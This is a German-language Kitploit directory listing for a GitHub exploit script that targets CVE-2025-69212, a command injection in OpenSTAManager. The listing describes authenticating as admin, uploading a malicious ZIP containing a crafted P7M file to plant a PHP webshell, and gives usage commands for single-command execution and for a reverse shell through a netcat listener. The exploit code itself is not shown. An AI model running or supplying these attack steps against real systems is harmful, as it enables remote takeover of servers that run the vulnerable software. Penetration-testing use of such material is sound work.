Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69212-Exploit — Automatisierter Exploit für die Befehlsinjektion CVE-2025-69212 in OpenSTAManager mit Admin-Authentifizierung, Hochladen bösartiger ZIP-Dateien sowie Reverse-Shell- oder Befehlsausführung. | Kitploit
Tools/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
ExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

Automatisierter Exploit für die Befehlsinjektion CVE-2025-69212 in OpenSTAManager mit Admin-Authentifizierung, Hochladen bösartiger ZIP-Dateien sowie Reverse-Shell- oder Befehlsausführung.

Repository anzeigen
17vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69212 - OpenSTAManager P7M Befehlsinjektions-Exploit

Ein vollautomatisiertes Exploit-Skript für CVE-2025-69212, eine Befehlsinjektions-Schwachstelle in OpenSTAManager. Dieses Skript authentifiziert sich mit Admin-Zugangsdaten, lädt eine schädliche PHP-Webshell über eine präparierte P7M-Datei in einem ZIP-Archiv hoch und ermöglicht die Ausführung von Befehlen oder eine Reverse Shell.

Funktionen

  • Automatisierte Authentifizierung.
  • Erzeugung und Upload einer schädlichen ZIP-Datei (invoice.p7m-Injektion).
  • Base64-Kodierung von Befehlen, um Probleme mit Sonderzeichen zu vermeiden.
  • Argumente für Reverse Shell und Einzelbefehlsausführung.

Verwendung

python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>

Beispiele:

Einen einzelnen Befehl ausführen:

python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

Reverse Shell erhalten:

# Start your netcat listener in another terminal:
nc -lvnp 4444

# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
Tool herunterladen